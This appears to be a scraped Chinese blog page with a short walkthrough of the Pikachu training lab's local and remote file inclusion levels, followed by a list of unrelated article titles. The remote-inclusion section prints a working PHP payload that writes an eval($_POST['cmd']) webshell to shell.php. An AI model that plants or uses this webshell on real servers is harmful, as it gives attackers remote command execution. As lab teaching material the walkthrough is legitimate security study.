当前位置: 首页 > news >正文

pikachu文件包含漏洞靶场(本地文件包含+远程文件包含关卡)

本地文件包含

1.来到关卡随便点击一个提交

可以发现这里可以读取文件

这是1.txt内容

能读取到上一级文件那么也就可以读取本地文件

上传一个jpg文件

拿去连就ok了

远程包含

包含写木马的文件

该文件内容如下,其作用是在fi_remote.php文件的同级目录下新建一个文件1.txt,并将一句话木马写入shell.php

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

然后读取这个txt文件写入shell.php这里读完后页面没有显示我们直接连一下看看

连接成功说明写进去了


http://www.mrgr.cn/news/19077.html

相关文章:

  • ​yum安装/更新时报错:SyntaxError: invalid syntax​
  • Linux学习-虚拟化平台安装和使用
  • 操作符的优先级和结合性
  • Java-数据结构-链表-LinkedList(二)|ू・ω・` )
  • 【前端面试】leetcode树javascript
  • 【IPV6从入门到起飞】2-1 获取你的IPV6(手机、CPE等)
  • opencv简单介绍
  • ARM汇编
  • 一阶微分方程的解的存在唯一性定理
  • BaseCTF-week2-wp
  • zdppy+vue3+onlyoffice文档管理系统实战 20240903 上课笔记 登录功能完成
  • 【C++】C++智能指针详解
  • 函数的力量:掌握Python中的“返回值”艺术
  • 【60天备战软考高级系统架构设计师——第七天:架构风格】
  • kafka基础知识(持续更新中~)
  • 单端输入与差分输入
  • 标准库标头 <optional> (C++17)学习之optional
  • redis之缓存淘汰策略
  • tcp udp
  • HTB-bike(SSTI模版注入)